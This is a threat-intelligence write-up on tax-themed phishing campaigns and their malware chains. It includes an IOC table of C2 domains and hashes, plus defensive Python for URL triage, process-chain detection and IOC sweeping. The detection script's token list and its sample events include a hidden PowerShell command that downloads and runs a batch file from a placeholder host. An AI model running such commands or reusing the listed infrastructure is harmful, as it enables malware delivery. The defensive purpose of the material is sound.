
Tax Season Phishing 2025 - Full Threat Breakdown

Threat actors are exploiting the 2025 tax season with phishing campaigns delivering malware like BRc4, Latrodectus, Remcos, and more. Here's how attackers are using IRS lures, QR codes, and PhaaS platforms to breach U.S. organizations.

As the U.S. tax deadline approaches, cybercriminals are once again capitalizing on seasonal anxiety to deploy highly targeted phishing campaigns. Microsoft Threat Intelligence has tracked a surge in tax-themed lures designed to steal credentials and deliver malware, including Latrodectus, BruteRatel C4 (BRc4), GuLoader, and Remcos, using QR codes, redirect chains, and phishing-as-a-service (PhaaS) kits to get past mail filtering.

Phishing email pretending to be IRS. Source: Microsoft

Overview: Social Engineering Meets Modular Malware Delivery

The campaigns analyzed span multiple threat actors and malware delivery techniques, often beginning with convincing IRS-themed lures. These phishing emails exploit trust in familiar services—like DocuSign or Microsoft 365—and rely on redirection tactics to evade detection.

Microsoft observed:

  • Fake tax verification forms with embedded links

  • PDF attachments containing QR codes

  • Redirects hosted on compromised websites

  • Abused cloud services (e.g., Firebase, Dropbox)

Each vector leads victims down a malware delivery chain that often ends in system compromise and remote control.

Notable Campaigns Observed in Early 2025

BRc4 and Latrodectus: Delivered via Fake IRS Verification Forms

On February 6, 2025, Microsoft detected a large-scale phishing campaign targeting U.S.-based users with IRS-themed emails. The messages claimed there were issues with the recipient’s tax filing and carried PDF attachments named to resemble IRS verification forms (e.g., lrs_Verification_Form_2182.pdf, with a lowercase "l" standing in for the "I" of "IRS"). Once opened, the PDF's embedded link pointed at a DoubleClick ad-tracking URL that redirected through a Rebrandly link shortener to a fake DocuSign page. If the victim clicked the “Download” button on the spoofed page, a script checked the visitor's system information before serving a JavaScript file hosted on Firebase, a filter that withholds the payload from systems the actor does not want to infect.

If the victim passed the filter conditions, the JavaScript downloaded an MSI installer that deployed BRc4, which in turn installed Latrodectus. Microsoft attributes the campaign to Storm-0249, an access broker active since 2021 and previously linked to Emotet, IcedID, and Bumblebee distribution. Latrodectus, observed here in its updated 1.9 variant, is a loader with anti-analysis and persistence capabilities, while BRc4, a commercial red-team framework, continues to be abused outside its intended use.

Threat actor: Storm-0249
Initial lure: Tax filing error notices with PDF attachments
Delivery mechanism:

  1. PDF links to DoubleClick → Rebrandly → Fake DocuSign site

  2. Downloads a JavaScript payload → MSI → Installs BRc4

  3. BRc4 then installs Latrodectus

Latrodectus is primarily a loader with dynamic C2 configs and anti-analysis features, now updated to persist via scheduled tasks and support command execution.

PDF attachment masquerading as a DocuSign document. Source: Microsoft

QR Code PDFs: Phishing-as-a-Service via RaccoonO365

Between February 12 and 28, over 2,300 organizations were targeted with tax-themed phishing emails containing no body text—just a PDF attachment. Each PDF displayed a QR code leading to a credential harvesting site hosted at shareddocumentso365cloudauthstorage[.]com. These phishing kits were powered by RaccoonO365, a PhaaS platform known for mimicking Microsoft 365 login pages and dynamically customizing links with the target’s email address as a query parameter.

Attackers used misleading sender display names like “EMPLOYEE TAX REFUND REPORT” or “Insurance Payment Schedule” to avoid suspicion. The campaign illustrates why QR codes have become a favourite initial-access vector: the URL is encoded in an image rather than in a text hyperlink, so a gateway that extracts and reputation-checks only clickable links never sees the destination, and the victim typically scans with a personal phone that sits outside the corporate proxy, EDR, and conditional-access controls. One scan and one password typed into the fake login page is enough to compromise the identity.

Targeted industries: Engineering, IT, consulting
Date range: Feb 12–28, 2025
Mechanism:

  • Blank emails with PDF attachments

  • Each PDF contains a QR code unique to the recipient (email in query string)

  • Links lead to fake Microsoft 365 login pages hosted via RaccoonO365 PhaaS

Display names used include misleading titles like “EMPLOYEE TAX REFUND REPORT” or “Client Contract Negotiation.”

PDF with QR code. Source: Microsoft
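The BRc4/Latrodectus chain starts from a link annotation inside the PDF, and the RaccoonO365 campaign hides its link in a QR image; in both cases an analyst ends up holding a URL to judge. The Python below is an added example, not Microsoft's tooling and not code from the original report. It pulls /URI link targets out of a PDF attachment with a regex and then scores URLs, including QR payloads already decoded by a tool such as zbar, against three signals from these campaigns: ad-network or shortener redirectors, Microsoft or DocuSign brand words on a non-Microsoft host, and the recipient's e-mail address embedded in the link. The sample PDF and the decoded QR strings are constructed; the redirector and brand-word lists are my assumptions; shareddocumentso365cloudauthstorage.com is the host named in the campaign above.

```python
"""Triage URLs found in tax-lure PDFs: link annotations plus decoded QR codes.

Added example, not Microsoft's tooling. QR decoding needs an image library
(e.g. pyzbar), so decoded QR strings are passed in as plain text here.
"""
import re
from urllib.parse import parse_qs, urlparse

# Hosts the genuine Microsoft 365 sign-in flow uses. Any other host that
# borrows these brand words is treated as a lookalike. (Assumed lists.)
MS_LOGIN_DOMAINS = {"login.microsoftonline.com", "login.live.com", "login.microsoft.com"}
BRAND_WORDS = ("o365", "office365", "microsoft", "sharepoint", "onedrive", "docusign")
# Redirect/shortener services used in the BRc4/Latrodectus chain.
REDIRECTORS = {"ad.doubleclick.net", "rebrand.ly"}
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
# PDF link annotation: /A << /S /URI /URI (https://...) >>; tolerates \( \) \\ escapes.
PDF_URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)", re.DOTALL)


def extract_pdf_uris(pdf_bytes: bytes) -> list[str]:
    """Return /URI targets from an uncompressed PDF.

    Caveat: links inside Flate-compressed object streams are invisible to this
    regex until the file is decompressed (qpdf --qdf or a PDF library).
    """
    uris = []
    for m in PDF_URI_RE.finditer(pdf_bytes):
        raw = m.group(1).decode("latin-1")
        uris.append(re.sub(r"\\([()\\])", r"\1", raw))  # undo PDF string escapes
    return uris


def assess_url(url: str) -> dict:
    """Score one URL against the three campaign signals; reasons come out in a fixed order."""
    p = urlparse(url)
    host = (p.hostname or "").lower()
    reasons = []
    if host in REDIRECTORS:
        reasons.append("ad-network/shortener redirector")
    if host not in MS_LOGIN_DOMAINS and any(w in host for w in BRAND_WORDS):
        reasons.append("brand keyword in non-Microsoft host")
    # RaccoonO365-style per-target links carry the victim address in the query
    # (or fragment) so the fake login page can pre-fill it.
    values = [v for vals in parse_qs(p.query).values() for v in vals] + [p.fragment]
    if any(EMAIL_RE.match(v) for v in values):
        reasons.append("recipient email embedded in link (per-target URL)")
    return {"url": url, "host": host, "reasons": reasons, "suspicious": bool(reasons)}


def triage(pdf_bytes: bytes, decoded_qr: list[str]) -> list[dict]:
    """Assess every PDF link plus every decoded QR payload; return only the suspicious ones."""
    candidates = extract_pdf_uris(pdf_bytes) + list(decoded_qr)
    return [r for r in (assess_url(u) for u in candidates) if r["suspicious"]]


# --- constructed sample input (not a real attachment) ---
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj\n"
    b"4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 300 720]\n"
    b"   /A << /S /URI /URI (https://ad.doubleclick.net/ddm/clk/000?u=https://rebrand.ly/example) >> >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
# Decoded QR payloads: the first uses the host from the RaccoonO365 campaign with a
# constructed recipient address; the second is a genuine Microsoft sign-in URL.
SAMPLE_QR = [
    "https://shareddocumentso365cloudauthstorage.com/auth/?email=jane.doe@example.com",
    "https://login.microsoftonline.com/common/oauth2/authorize?client_id=abc",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_PDF, SAMPLE_QR):
        print(f"{hit['host']:<45} {'; '.join(hit['reasons'])}")
```

Run it against real attachments by feeding `extract_pdf_uris` the raw file and `triage` the strings your QR decoder returns; the regex only sees uncompressed objects, so decompress with qpdf first when it returns nothing for a PDF that visibly contains a link.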

AHKBot: Delivered Through Malicious Excel File

On February 13, Microsoft observed a phishing email with the subject line "IRS Refund Eligibility Notification" sent from the domain eboxsystems[.]com. The email linked to a Google Business page that acted as an open redirector, which in turn pointed to a compromised site hosting a malicious .xlsm file. If the user enabled macros in this Excel workbook, the macro downloaded and executed an MSI file from acusense[.]ae.

The MSI package contained a legitimate AutoHotKey.exe binary and a malicious script, AutoNotify.ahk, which ran in an infinite loop to download additional AutoHotKey-based payloads. One of the follow-on modules, Screenshotter, captured screen content from infected machines and exfiltrated it to the C2 IP 181.49.105[.]59. The attack is notable for shipping its own legitimate interpreter: the AutoHotKey binary itself is benign, so all of the malicious logic lives in a script file, and a defender who only examines executables sees nothing unusual during the early infection stages.

Observed: Feb 13, 2025
Lure: “IRS Refund Eligibility Notification”
Delivery flow:

  • Hyperlink leads to Google redirector → Compromised site hosting Excel file

  • Macros enabled → Downloads malicious MSI from acusense[.]ae

  • MSI contains:

    • Legitimate AutoHotKey binary

    • Malicious .ahk Looper script

    • Screenshotting module

C2 communication was handled through IP 181.49.105[.]59.

Phishing email to download malicious Excel file. Source: Microsoft

GuLoader and Remcos: Rapport-Building Campaign

Another tax-themed campaign, observed on March 3, took a more conversational approach. The threat actor emailed CPAs and accountants with a benign message claiming that a previous CPA had been negligent and asking for help with an urgent tax filing. Only if the recipient replied did a second email follow, this one with a PDF attachment containing an embedded Dropbox link. That link downloaded a ZIP archive of .lnk files disguised as tax documents.

When one of the LNK files was executed, it launched PowerShell commands to download a BAT script and a decoy PDF. The BAT file then fetched GuLoader, which finally installed Remcos RAT. This multi-stage infection chain invested in social trust and engagement before delivering malware. The use of remote access tools like Remcos, known for keylogging, screen capture, and persistence, underscores the risk to professionals who handle financial data and PII.

Observed: March 3, 2025
Target: CPAs and accounting professionals
Tactic:

  1. Email 1: Benign inquiry from a fake client

  2. Email 2: Malicious PDF attachment if the recipient responds

  3. PDF downloads ZIP from Dropbox → LNK file → PowerShell → GuLoader → Remcos

This two-step approach aims to build trust before delivering the payload, increasing click-through and execution rates.

Phishing email shows the original benign request for tax filing services, followed by another email containing a malicious PDF attachment if the target replies. Source: Microsoft
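Both the AHKBot chain (Excel macro, msiexec, bundled AutoHotKey interpreter) and the CPA-lure chain (LNK, PowerShell cradle, BAT stage, GuLoader) leave a distinctive parent/child trail in process-creation telemetry. The Python below is an added example, not Microsoft's detection logic or KQL, that runs five such rules over constructed Sysmon-style events; the field names (parent_image, image, command_line), the token lists, and the example.invalid hosts are assumptions to adapt to your own EDR export.

```python
"""Process-creation detections for the Excel->MSI->AutoHotkey and LNK->PowerShell->BAT chains.

Added example, not Microsoft's detection logic. Events are constructed
Sysmon-style records; the field names (parent_image, image, command_line)
are an assumed schema, adapt them to your EDR export.
"""
import re
from pathlib import PureWindowsPath

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Processes that hand an opened .lnk to the shell: Explorer or an archive viewer.
LNK_LAUNCHERS = {"explorer.exe", "7zfm.exe", "winrar.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\public\\")
CRADLE_TOKENS = ("downloadfile", "downloadstring", "invoke-webrequest", "iwr ", "curl ",
                 "invoke-expression", "iex ", "-enc", "-encodedcommand", "frombase64string",
                 "-w hidden", "-windowstyle hidden")


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _user_writable(text: str) -> bool:
    t = text.lower()
    return any(seg in t for seg in USER_WRITABLE)


def detect(event: dict) -> list[str]:
    """Return the rule names an event trips (empty list = nothing suspicious)."""
    parent, image = _name(event.get("parent_image", "")), _name(event.get("image", ""))
    low = event.get("command_line", "").lower()
    hits = []
    # Stage 1 of the CPA lure: a .lnk opened from Explorer launches a PowerShell download cradle.
    if image in SHELLS and parent in LNK_LAUNCHERS and any(t in low for t in CRADLE_TOKENS):
        hits.append("lnk_powershell_cradle")
    # Stage 2: PowerShell hands off to a .bat dropped in a user-writable path (fetches GuLoader).
    if image == "cmd.exe" and parent in SHELLS and re.search(r"\.bat\b", low) and _user_writable(low):
        hits.append("bat_stage_from_user_path")
    # AHKBot: an enabled macro makes Excel spawn msiexec (or another script host).
    if parent in OFFICE and image in {"msiexec.exe", "cmd.exe", "wscript.exe", "mshta.exe"} | SHELLS:
        hits.append("office_spawns_installer_or_script_host")
    # msiexec pulling a package from a URL or a user-writable path rather than a managed share.
    if image == "msiexec.exe" and ("http" in low or _user_writable(low)):
        hits.append("msiexec_remote_or_user_path_package")
    # The bundled AutoHotkey interpreter running a script from a user-writable path.
    if image.startswith("autohotkey") and re.search(r"\.ahk\b", low) and _user_writable(low):
        hits.append("autohotkey_script_from_user_path")
    return hits


def run(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(event index, rules tripped) for every event that tripped at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed events; hosts are example.invalid placeholders, not the campaign's infrastructure.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -c iwr http://example.invalid/r.bat -OutFile $env:TEMP\r.bat; cmd /c $env:TEMP\r.bat"},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c C:\Users\jdoe\AppData\Local\Temp\r.bat"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /i https://example.invalid/pkg.msi /qn"},
    {"parent_image": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Users\jdoe\AppData\Local\Temp\AutoHotkey.exe",
     "command_line": r"C:\Users\jdoe\AppData\Local\Temp\AutoHotkey.exe C:\Users\jdoe\AppData\Local\Temp\AutoNotify.ahk"},
    # Benign: an admin runs a script from a fixed location; a service triggers msiexec.
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\report.ps1"},
    {"parent_image": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r"msiexec.exe /V"},
]

if __name__ == "__main__":
    for idx, rules in run(SAMPLE_EVENTS):
        print(idx, _name(SAMPLE_EVENTS[idx]["image"]), rules)
```

The rules key on parent/child relationships and on where the script or package lives rather than on file hashes, so they survive the repacking these loaders go through between campaigns; expect the Office-child rule to need an allowlist for line-of-business add-ins that legitimately spawn msiexec.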

Key Payloads and Infrastructure

Each campaign delivered one or more modular tools built for stealth, persistence, or lateral movement. BRc4, though marketed as a legitimate red-teaming tool, continues to be co-opted for real-world attacks. Latrodectus, in its latest form, adds command execution and scheduled-task persistence to its loader role. GuLoader and AHKBot both serve as delivery mechanisms for more capable payloads such as the Remcos RAT, which remains a popular post-infection toolkit among cybercrime groups. Collectively, these payloads form a flexible stack of initial access, control, and data theft capabilities that can be repurposed across verticals.

  • BRc4: Red-teaming tool used for post-exploitation and lateral movement

  • Latrodectus: Modular loader with strong evasion techniques

  • GuLoader: Shellcode-based loader with obfuscation and sandbox detection

  • Remcos: RAT capable of screen capture, keystroke logging, and stealth operations

  • AHKBot: AutoHotKey-based loader for modular malware delivery

  • RaccoonO365: Phishing-as-a-Service mimicking Microsoft login flows

Detection and Mitigation Guidance

Microsoft recommends a layered defense strategy, starting with phishing-resistant authentication (FIDO2 security keys, passkeys, or certificate-based authentication) and MFA enforced for every account; a RaccoonO365 page that captures a password and a one-time code still cannot satisfy an authenticator whose credential is bound to the legitimate login origin. Organizations should enable Safe Links and Zero-Hour Auto Purge (ZAP) in Microsoft 365 to recheck URLs at click time and to retroactively remove messages found malicious after delivery. Email security gateways should decode QR codes found in attachments and inline images and subject the decoded URL to the same reputation and sandbox checks as a text hyperlink; a gateway that only extracts text links never sees the destination. Browser-based defenses like SmartScreen and network-level protections such as Microsoft Defender’s Network Protection can block the later hops of a redirect chain even when the first link passes.

Security teams should also consider endpoint-level safeguards like Defender for Endpoint’s EDR in block mode, cloud-delivered protection, and automated investigation and remediation features. Finally, ongoing user education—especially for high-risk groups like finance and HR—should include updated phishing simulations using QR codes, spoofed DocuSign pages, and tax refund lures.

  • Enforcing MFA and phishing-resistant authentication

  • Educating employees on social engineering tactics and IRS impersonation

  • Blocking QR-code-based redirects and monitoring for PhaaS indicators

  • Using Safe Links and Defender for Office 365’s ZAP and click-verification features

  • Leveraging Microsoft Defender XDR and Sentinel for automated detection and hunting queries

IOCs

For the full IOC list, see Microsoft Threat Intelligence’s original report (thanks to them for compiling it). As an example, here are the indicators for one chain:

BruteRatel C4 and Latrodectus infection chain

Indicator | Type | Description
9bffe9add38808b3f6021e6d07084a06300347dd5d4b7e159d97e949735cff1e | SHA-256 | lrs_Verification_Form_1730.pdf
0b22a0d84afb8bc4426ac3882a5ecd2e93818a2ea62d4d5cbae36d942552a36a | SHA-256 | Irs_verif_form_2025_214859.js
4d5839d70f16e8f4f7980d0ae1758bb5a88b061fd723ea4bf32b4b474c222bec | SHA-256 | bars.msi
a1b4db93eb72a520878ad338d66313fbaeab3634000fb7c69b1c34c9f3e17727 | SHA-256 | BRc4, filename: nvidiamast.dll
hxxp://rebrand[.]ly/243eaa | URL | URL shortener link to load fake DocuSign page
slgndocline.onlxtg[.]com | Domain name | Domain used to host fake DocuSign page
cronoze[.]com | Domain name | BRc4 C2
muuxxu[.]com | Domain name | BRc4 C2
proliforetka[.]com | Domain name | Latrodectus C2
porelinofigoventa[.]com | Domain name | Latrodectus C2
hxxp://slgndocline.onlxtg[.]com/87300038978/ | URL | Fake DocuSign URL
hxxps://rosenbaum[.]live/bars.php | URL | JavaScript downloading MSI
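The indicators above are published defanged (hxxp, [.]), and the fake DocuSign URL is listed as http while a proxy will usually log the https upgrade, so a naive string match misses real hits. The Python below is an added example (not Microsoft's tooling): it refangs the table as printed on this page, builds hash, domain and URL lookups, and sweeps constructed proxy, DNS and file-event records, matching URLs on host plus path regardless of scheme and domains on the apex or any subdomain. The record schema (host / url / sha256 keys) and the telemetry records themselves are constructed.

```python
"""Refang the IOC table above and sweep constructed proxy/DNS/file telemetry for it.

Added example, not Microsoft's. Indicator strings are copied from the table on
this page; the telemetry records are constructed and the record schema
(host / url / sha256 keys) is an assumption.
"""
import re
from urllib.parse import urlparse

IOC_TABLE = [  # (indicator, type, description) as published, still defanged
    ("9bffe9add38808b3f6021e6d07084a06300347dd5d4b7e159d97e949735cff1e", "SHA-256", "lrs_Verification_Form_1730.pdf"),
    ("0b22a0d84afb8bc4426ac3882a5ecd2e93818a2ea62d4d5cbae36d942552a36a", "SHA-256", "Irs_verif_form_2025_214859.js"),
    ("4d5839d70f16e8f4f7980d0ae1758bb5a88b061fd723ea4bf32b4b474c222bec", "SHA-256", "bars.msi"),
    ("a1b4db93eb72a520878ad338d66313fbaeab3634000fb7c69b1c34c9f3e17727", "SHA-256", "BRc4, filename: nvidiamast.dll"),
    ("hxxp://rebrand[.]ly/243eaa", "URL", "URL shortener to load fake DocuSign page"),
    ("slgndocline.onlxtg[.]com", "Domain name", "Domain used to host fake DocuSign page"),
    ("cronoze[.]com", "Domain name", "BRc4 C2"),
    ("muuxxu[.]com", "Domain name", "BRc4 C2"),
    ("proliforetka[.]com", "Domain name", "Latrodectus C2"),
    ("porelinofigoventa[.]com", "Domain name", "Latrodectus C2"),
    ("hxxp://slgndocline.onlxtg[.]com/87300038978/", "URL", "Fake DocuSign URL"),
    ("hxxps://rosenbaum[.]live/bars.php", "URL", "JavaScript downloading MSI"),
]


def refang(ioc: str) -> str:
    """Undo the common defanging conventions: hxxp(s) -> http(s), [.] or (.) -> ., [://] and [:]."""
    s = ioc.strip()
    s = re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)
    for bad, good in (("[.]", "."), ("(.)", "."), ("[://]", "://"), ("[:]", ":")):
        s = s.replace(bad, good)
    return s


def url_key(url: str) -> str:
    """host + path with scheme and query dropped: proxies often log the https upgrade of an http IOC."""
    p = urlparse(url)
    return (p.hostname or "").lower() + (p.path.rstrip("/") or "/")


def build_index(table):
    """Split the table into lookups keyed the way each telemetry field will be compared.

    Hosts of URL indicators are deliberately not promoted to domain indicators:
    rebrand.ly is shared infrastructure and would match legitimate traffic.
    """
    hashes, domains, urls = {}, {}, {}
    for raw, kind, desc in table:
        v = refang(raw)
        if kind == "SHA-256":
            hashes[v.lower()] = desc
        elif kind == "URL":
            urls[url_key(v)] = desc
        elif kind == "Domain name":
            domains[v.lower()] = desc
    return hashes, domains, urls


def domain_hit(host, domains):
    """Exact match or any subdomain of a listed domain (C2s rotate hostnames under one apex)."""
    host = (host or "").lower().rstrip(".")
    for d, desc in domains.items():
        if host == d or host.endswith("." + d):
            return d, desc
    return None


def hunt(records, table=IOC_TABLE):
    """Return (record index, matched field, IOC description) for every record that hits the table."""
    hashes, domains, urls = build_index(table)
    findings = []
    for i, r in enumerate(records):
        url = r.get("url")
        if url and url_key(url) in urls:
            findings.append((i, "url", urls[url_key(url)]))
        else:
            host = r.get("host") or (urlparse(url).hostname if url else None)
            hit = domain_hit(host, domains)
            if hit:
                findings.append((i, "domain", hit[1]))
        digest = (r.get("sha256") or "").lower()
        if digest in hashes:
            findings.append((i, "sha256", hashes[digest]))
    return findings


# Constructed telemetry (not real logs).
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "url": "https://slgndocline.onlxtg.com/87300038978/"},   # proxy: fake DocuSign page over https
    {"src": "10.0.0.7", "host": "cdn.cronoze.com"},                             # DNS: subdomain of a BRc4 C2
    {"src": "10.0.0.9", "path": r"C:\Users\jdoe\Downloads\bars.msi",
     "sha256": "4D5839D70F16E8F4F7980D0AE1758BB5A88B061FD723EA4BF32B4B474C222BEC"},  # file event, uppercase hash
    {"src": "10.0.0.5", "url": "https://www.microsoft.com/"},                   # benign
]

if __name__ == "__main__":
    for idx, field, desc in hunt(SAMPLE_RECORDS):
        print(f"record {idx}: {field} matched -> {desc}")
```

Query strings are dropped from the URL key on purpose, since the kits append per-victim parameters; if you need them, compare `urlparse(url).query` separately rather than widening the key.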

Final Thoughts

Even well-known social engineering tactics remain effective when combined with evasive malware and PhaaS infrastructure. Defenders should ensure layered protections, increase phishing simulations around key dates like April 15, and maintain updated threat hunting rules aligned with current IOCs.

Guards up!